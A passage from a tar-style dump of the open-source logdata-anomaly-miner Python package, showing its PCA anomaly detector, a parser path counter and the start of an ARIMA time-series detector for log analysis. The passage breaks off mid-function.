""" if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_values) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_values, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_values = 0 self.log_new_learned_values = [] logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/PCADetector.py000066400000000000000000000476021437606560100335120ustar00rootroot00000000000000""" This module defines a PCA-detector for event and value counts. The component detects anomalies by creating an Event-Count-Matrix for given time-windows to calculate an anomaly score for new time windows afterwards by using the reconstruction error from the inverse-transformation with restricted components of the Principal-Component-Analysis (PCA). This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import copy import numpy as np import logging import os import time from aminer import AminerConfig from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LEVEL, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX,\ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.AnalysisChild import AnalysisContext from aminer.util import PersistenceUtil from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class PCADetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class creates events if event or value occurrence counts are outliers in PCA space.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, window_size, min_anomaly_score, min_variance, num_windows, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate dimensions. When no paths are specified, the events given by the full path list are analyzed (one dimension). @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param min_anomaly_score the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e., reasonable minimum scores are >1 to detect outliers with respect to currently trained PCA matrix. @param min_variance the minimum variance covered by the principal components in range [0, 1]. @param num_windows the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows. @param persistence_id name of persistence file. @param learn_mode specifies whether new count measurements are added to the PCA count matrix. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["ignore_list", "constraint_list"], aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, window_size=window_size, min_anomaly_score=min_anomaly_score, min_variance=min_variance, num_windows=num_windows, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # skipcq: PYL-W0511 # ToDo: an exception should be thrown instead of this check. if num_windows < 3: logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning('num_windows must be >= 3!') self.num_windows = 3 else: self.num_windows = num_windows self.first_log = True self.start_time = 0 self.event_count_matrix = [] self.feature_list = [] self.ecm = None self.log_windows = 0 self.pca_ecm = None self.eigen_vectors = None # number of components (n_comp): how many components should be used for reconstruction self.n_comp = None # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset self.loss = None self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.event_count_matrix = list(persistence_data) self.compute_pca() # Copy feature list into event count vector and reset counts of each feature self.event_count_vector = copy.deepcopy(self.event_count_matrix[0]) self.reset_event_count_vector() else: if self.target_path_list is None or len(self.target_path_list) == 0: # Only one dimension when events are used instead of values; use empty string as placeholder self.event_count_vector = {'': {}} else: self.event_count_vector = {} def receive_atom(self, log_atom): """Receive parsed atom and the information about the parser match.""" parser_match = log_atom.parser_match self.log_total += 1 if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return # get the timestamp of the first log to start the time-window-process (flag) if self.first_log: self.start_time = log_atom.get_timestamp() self.first_log = False current_time = log_atom.get_timestamp() while current_time >= (self.start_time + self.window_size): # PCA computation only possible when at least 3 vectors are present if len(self.event_count_matrix) >= 3: anomaly_score = self.anomaly_score() if anomaly_score > self.min_anomaly_score: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] affected_paths = [] affected_values = [] affected_counts = [] for path, count_dict in self.event_count_vector.items(): affected_paths.append(path) affected_values.append(list(count_dict.keys())) affected_counts.append(list(count_dict.values())) analysis_component = {'AffectedLogAtomPaths': affected_paths, 'AffectedLogAtomValues': affected_values, 'AffectedValueCounts': affected_counts, 'AnomalyScore': anomaly_score[0]} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'PCA anomaly detected', sorted_log_lines, event_data, log_atom, self) self.log_windows += 1 # Add new values to matrix in learn mode if self.learn_mode is True: if len(self.event_count_matrix) >= self.num_windows: del self.event_count_matrix[0] self.event_count_matrix.append(copy.deepcopy(self.event_count_vector)) # PCA computation only possible when at least 3 vectors are present if len(self.event_count_matrix) >= 3: self.repair_dict() self.compute_pca() if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Set window end time for next iteration self.start_time += self.window_size # Reset count vector for next time window self.reset_event_count_vector() if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return log_event = tuple(parser_match.get_match_dictionary().keys()) if log_event in self.event_count_vector['']: self.event_count_vector[''][log_event] += 1 else: self.event_count_vector[''][log_event] = 1 else: # Event is defined by values in target_path_list all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False if path in self.event_count_vector: if value in self.event_count_vector[path]: self.event_count_vector[path][value] += 1 else: self.event_count_vector[path][value] = 1 else: self.event_count_vector[path] = {value: 1} if all_values_none is True: return self.log_success += 1 def compute_pca(self): """Carry out PCA on current event count matrix.""" # extract the features out of ecm into a list self.feature_list = [] for events in self.event_count_matrix[0].values(): for feature in events: self.feature_list.append(feature) # extract existing event_counts into array matrix = [] for event_count in self.event_count_matrix: row = [] for event in event_count.values(): row += list(event.values()) matrix.append(row) self.ecm = np.array(matrix) # Principal Component Analysis (PCA) normalized_ecm = (self.ecm - self.ecm.mean()) / self.ecm.std() covariance_matrix = np.cov(normalized_ecm.T) eigen_values, eigen_vectors = np.linalg.eigh(covariance_matrix) self.pca_ecm = normalized_ecm @ eigen_vectors self.eigen_vectors = eigen_vectors # number of components (n_comp): how many components should be used for reconstruction self.n_comp = self.get_n_comp(eigen_values) # PCA Inverse with only these components which describes the min_variance pca_inverse = self.pca_ecm[:, :self.n_comp] @ eigen_vectors[:self.n_comp, :] # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset self.loss = np.sum((normalized_ecm - pca_inverse)**2, axis=1) def anomaly_score(self): """Calculate the anomalyscore for current event_count_vector.""" # convert the event_count_vector into an array ecv = self.vector2array() # normalize the ecv with the mean and std of learned ecm normalized_ecv = (ecv - self.ecm.mean()) / self.ecm.std() # reshape array into a 1-dimensional array normalized_ecv = normalized_ecv.reshape(1, -1) # calculate the reduced pca for current log-sequence with given eigen_vectors pca_ecv = normalized_ecv @ self.eigen_vectors # calculate the pca_inverse with reduced number of components / do reconstruction pca_inverse_ecv = pca_ecv[:, :self.n_comp] @ self.eigen_vectors[:self.n_comp, :] # calculate the reconstruction error / anomaly score loss = np.sum((normalized_ecv - pca_inverse_ecv)**2, axis=1) # scale the reconstruction error with the min, max of ecm-loss loss = (loss - np.min(self.loss)) / (np.max(self.loss) - np.min(self.loss)) return loss def vector2array(self): """Extract only the values which were learned before from current self.event_count_vector and return an array.""" vector = [] for event in self.event_count_vector.values(): for feature, value in event.items(): if feature in self.feature_list: vector.append(value) return np.array(vector) def get_n_comp(self, eigen_values): """Return the number of components, which describe the variance threshold.""" # Calculate the explained variance on each of components variance_explained = [] for i in eigen_values[::-1]: variance_explained.append((i/sum(eigen_values))*100) # Calculate the cumulative explained variance (np.cumsum) cumulative_variance_explained = np.cumsum(variance_explained) for n, i in enumerate(cumulative_variance_explained): if i > (self.min_variance * 100): return n return None def repair_dict(self): """Check if any new values were added in current event_count_vector and repair self.event_count_matrix when necessary.""" for ecv in self.event_count_matrix: for key, value in self.event_count_vector.items(): if key not in ecv.keys(): for val in value: ecv[key] = {val: 0} if not self.event_count_vector[key].keys() == ecv[key].keys(): for k in self.event_count_vector[key].keys(): if k not in ecv[key].keys(): ecv[key][k] = 0 def reset_event_count_vector(self): """Reset event_count_vector by setting all count-values to 0.""" for events in self.event_count_vector.values(): for value in events: events[value] = 0 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" if self.learn_mode is True: PersistenceUtil.store_json(self.persistence_file_name, list(self.event_count_matrix)) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) elif STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) self.log_success = 0 self.log_total = 0 self.log_windows = 0 logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/ParserCount.py000066400000000000000000000157161437606560100336630ustar00rootroot00000000000000""" This component counts occurring combinations of values and periodically sends the results as a report. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface current_processed_lines_str = 'CurrentProcessedLines' total_processed_lines_str = 'TotalProcessedLines' class ParserCount(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class creates a counter for path value combinations.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, report_interval=60, target_label_list=None, split_reports_flag=False): """ Initialize the ParserCount component. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param report_interval delay in seconds before reporting. @param target_label_list a list of labels for the target_path_list. This list must have the same size as target_path_list. @param split_reports_flag if true every path produces an own report, otherwise one report for all paths is produced. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( mutable_default_args=["target_path_list"], aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, report_interval=report_interval, target_label_list=target_label_list, split_reports_flag=split_reports_flag ) self.count_dict = {} self.next_report_time = None if (self.target_path_list is None or self.target_path_list == []) and ( self.target_label_list is not None and self.target_label_list != []): msg = 'Target labels cannot be used without specifying target paths.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.target_label_list is not None and len(self.target_path_list) != len(self.target_label_list): msg = 'Every path must have a target label if target labels are used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for target_path in self.target_path_list: if self.target_label_list: target_path = self.target_label_list[self.target_path_list.index(target_path)] self.count_dict[target_path] = {current_processed_lines_str: 0, total_processed_lines_str: 0} def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() success_flag = False for target_path in self.target_path_list: match_element = match_dict.get(target_path) if match_element is not None: success_flag = True if self.target_label_list: target_path = self.target_label_list[self.target_path_list.index(target_path)] self.count_dict[target_path][current_processed_lines_str] += 1 self.count_dict[target_path][total_processed_lines_str] += 1 if not self.target_path_list: path = iter(match_dict).__next__() if path not in self.count_dict: self.count_dict[path] = {current_processed_lines_str: 0, total_processed_lines_str: 0} self.count_dict[path][current_processed_lines_str] += 1 self.count_dict[path][total_processed_lines_str] += 1 if self.next_report_time is None: self.next_report_time = time.time() + self.report_interval if success_flag: self.log_success += 1 return True def do_timer(self, trigger_time): """Check current ruleset should be persisted.""" if self.next_report_time is None: return self.report_interval delta = self.next_report_time - trigger_time if delta <= 0: self.send_report() delta = self.report_interval self.next_report_time = time.time() + delta return delta # skipcq: PYL-R0201 def do_persist(self): """Immediately write persistence data to storage.""" return False def send_report(self): """Send a report to the event handlers.""" output_string = 'Parsed paths in the last ' + str(self.report_interval) + ' seconds:\n' if not self.split_reports_flag: for k in self.count_dict: c = self.count_dict[k] output_string += '\t' + str(k) + ': ' + str(c) + '\n' output_string = output_string[:-1] event_data = {'StatusInfo': self.count_dict, 'FromTime': time.time() - self.report_interval, 'ToTime': time.time()} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Count report', [output_string], event_data, None, self) else: for k in self.count_dict: output_string = 'Parsed paths in the last ' + str(self.report_interval) + ' seconds:\n' c = self.count_dict[k] output_string += '\t' + str(k) + ': ' + str(c) status_info = {k: { current_processed_lines_str: c[current_processed_lines_str], total_processed_lines_str: c[total_processed_lines_str]}} event_data = {'StatusInfo': status_info, 'FromTime': time.time() - self.report_interval, 'ToTime': time.time()} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Count report', [output_string], event_data, None, self) for k in self.count_dict: self.count_dict[k][current_processed_lines_str] = 0 logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__) PathArimaDetector.py000066400000000000000000000664121437606560100346760ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module is a detector which uses a tsa-arima model to analyze the values of the paths in target_path_list. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging import numpy as np import sys import statsmodels import statsmodels.api as sm from scipy.stats import binom_test from aminer import AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX,\ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class PathArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class is used for an arima time series analysis of the values of the paths in target_path_list.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, output_logline=True, learn_mode=False, num_init=50, force_period_length=False, set_period_length=10, alpha=0.05, alpha_bt=0.05, num_results_bt=15, num_min_time_history=20, num_max_time_history=30, num_periods_tsa_ini=20, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of events in the time windows. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param num_init number of lines processed before the period length is calculated. @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. @param set_period_length states how long the period length is if force_period_length is set to True. @param alpha significance level of the estimated values. @param alpha_bt significance level for the bt test. @param num_results_bt number of results which are used in the binomial test. @param num_min_time_history number of lines processed before the period length is calculated. @param num_max_time_history maximum number of values of the time_history. @param num_periods_tsa_ini number of periods used to initialize the Arima-model. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, output_logline=output_logline, learn_mode=learn_mode, num_init=num_init, force_period_length=force_period_length, set_period_length=set_period_length, alpha=alpha, alpha_bt=alpha_bt, num_results_bt=num_results_bt, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_periods_tsa_ini=num_periods_tsa_ini, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Add the PathArimaDetector to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = 'Changed the parameter save_values of the VTD from False to True to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.save_values = True # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < self.num_periods_tsa_ini * int(self.num_init/2): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{self.num_periods_tsa_ini * int(self.num_init/2)} to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = self.num_periods_tsa_ini * int(self.num_init/2) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < self.num_periods_tsa_ini * int(self.num_init/2) + 500: msg = f'Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{self.num_periods_tsa_ini * int(self.num_init/2) + 500} to use pregenerated critical values for the gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = self.num_periods_tsa_ini * int(self.num_init/2) + 500 # List of the indices of the target_paths in the ETD self.target_path_index_list = [] # List of the period_lengths self.period_length_list = [] # List of the the single arima_models (statsmodels) self.arima_models = [] # List of the observed values and the predictions of the TSAArima self.prediction_history = [] # List of the the results if th value was in the limits of the one step predictions self.result_list = [] # Minimal number of successes for the binomial test in the last num_results_bt results self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt) # Loads the persistence self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.target_path_index_list, self.period_length_list, self.prediction_history] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.target_path_index_list = persistence_data[0] self.period_length_list = persistence_data[1] self.prediction_history = persistence_data[2] def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. Tests if the event type includes paths of target_path_list and analyzes their values with an TSA Arima model. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ event_index = self.event_type_detector.current_index if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Check if enough log lines have appeared to calculate the period length, initialize the arima model, or make a prediction if (len(self.period_length_list) <= event_index or self.period_length_list[event_index] is None) and\ len(self.event_type_detector.values[self.event_type_detector.current_index][0]) >= self.num_init: # Extend the list of the period_lengths and target_path_index if necessary if len(self.period_length_list) <= event_index: self.period_length_list += [None for _ in range(len(self.period_length_list), event_index + 2)] self.target_path_index_list += [None for _ in range(len(self.target_path_index_list), event_index + 2)] # Add all paths to the target_path_list if they are included in the ET and solely consist of floats self.target_path_index_list[event_index] = [] for target_path in self.target_path_list: if target_path in self.event_type_detector.variable_key_list[event_index]: var_index = self.event_type_detector.variable_key_list[event_index].index(target_path) if all(type(val) is float for val in self.event_type_detector.values[event_index][var_index]): self.target_path_index_list[event_index].append(var_index) # Calculate the period_length of the current event types values counts = [self.event_type_detector.values[event_index][var_index] for var_index in self.target_path_index_list[event_index]] self.calculate_period_length(event_index, counts, log_atom) # Try to initialize the arima model self.test_num_appearance(event_index, log_atom) elif len(self.period_length_list) > event_index and self.period_length_list[event_index] is not None: # Try to initialize or make a prediction with the arima model self.test_num_appearance(event_index, log_atom) return True def calculate_period_length(self, event_index, counts, log_atom): """Returns a list of the period length, if no period was found the value is set to -1""" if self.force_period_length: # Check if the period length should be forced self.period_length_list[event_index] = [self.set_period_length for _ in counts] else: # Calculate the period lengths with the auto correlation function self.period_length_list[event_index] = [None for _ in counts] for target_path_index, data in enumerate(counts): if data is not None: # Apply the autocorrelation function to the data of the single target_paths. corr = list(map(abs, sm.tsa.acf(data, nlags=len(data), fft=True))) corr = np.array(corr) min_lag = -1 # Find the first local minimum for i in range(1, len(corr)-1): if corr[i] == min(corr[i-1: i+2]): min_lag = i break # Find the highest peak and set the time-step as the index + lag if min_lag != -1: highest_peak_index = np.argmax(corr[min_lag:]) self.period_length_list[event_index][target_path_index] = int(highest_peak_index + min_lag) # Print a message of the length of the time steps message = f'Calculated the periods for the event {self.event_type_detector.get_event_type(event_index)}: ' \ f'{self.period_length_list[event_index]}' affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) def test_num_appearance(self, event_index, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance""" # Return, if not TSA should be calculated for this ET if all(period is None for period in self.period_length_list[event_index]): return # Append the lists for the arima models if it is too short if len(self.arima_models) <= event_index: self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.result_list += [None for _ in range(event_index + 1 - len(self.result_list))] if len(self.prediction_history) <= event_index: self.prediction_history += [None for _ in range(event_index + 1 - len(self.prediction_history))] # Initialize the lists for the arima models for this ET if self.arima_models[event_index] is None: self.arima_models[event_index] = [None for _ in range(len(self.target_path_index_list[event_index]))] self.result_list[event_index] = [[] for _ in range(len(self.target_path_index_list[event_index]))] if self.prediction_history[event_index] is None: self.prediction_history[event_index] = [[[], [], []] for _ in range(len(self.target_path_index_list[event_index]))] # Check if the new values are floats if any(not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float) for var_index in self.target_path_index_list[event_index]): delete_indices = [count_index for count_index, var_index in enumerate(self.target_path_index_list[event_index]) if not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float)] delete_indices.sort(reverse=True) for count_index in delete_indices: # Remove the entries of the lists if len(self.target_path_index_list) > event_index and len(self.target_path_index_list[event_index]) > count_index: self.target_path_index_list[event_index] = self.target_path_index_list[event_index][:count_index] +\ self.target_path_index_list[event_index][count_index + 1:] if len(self.period_length_list) > event_index and len(self.period_length_list[event_index]) > count_index: self.period_length_list[event_index] = self.period_length_list[event_index][:count_index] +\ self.period_length_list[event_index][count_index + 1:] if len(self.arima_models) > event_index and len(self.arima_models[event_index]) > count_index: self.arima_models[event_index] = self.arima_models[event_index][:count_index] +\ self.arima_models[event_index][count_index + 1:] if len(self.prediction_history) > event_index and len(self.prediction_history[event_index]) > count_index: self.prediction_history[event_index] = self.prediction_history[event_index][:count_index] +\ self.prediction_history[event_index][count_index + 1:] if len(self.result_list) > event_index and len(self.result_list[event_index]) > count_index: self.result_list[event_index] = self.result_list[event_index][:count_index] +\ self.result_list[event_index][count_index + 1:] # skipcq: PYL-C0209 message = 'Disabled the TSA for the target paths %s of event %s' % ( [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in delete_indices], self.event_type_detector.get_event_type(event_index)) affected_path = [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in delete_indices] self.print(message, log_atom, affected_path) # Initialize and update the arima_model if possible for count_index, var_index in enumerate(self.target_path_index_list[event_index]): # Initialize the arima_model if possible if self.learn_mode and self.arima_models[event_index][count_index] is None: if self.period_length_list[event_index][count_index] is not None: # Add the current value to the lists self.prediction_history[event_index][count_index][0].append(0) self.prediction_history[event_index][count_index][1].append(self.event_type_detector.values[event_index][var_index][-1]) self.prediction_history[event_index][count_index][2].append(0) # Check if enough values have been stored to initialize the arima_model if len(self.event_type_detector.values[event_index][var_index]) >= self.num_periods_tsa_ini *\ self.period_length_list[event_index][count_index]: message = f'Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)} and ' \ f'targetpath {self.event_type_detector.variable_key_list[event_index][count_index]}' affected_path = self.event_type_detector.variable_key_list[event_index][count_index] self.print(message, log_atom, affected_path) # Add the arima_model to the list try: model = statsmodels.tsa.arima.model.ARIMA( self.event_type_detector.values[event_index][var_index][ -self.num_periods_tsa_ini * 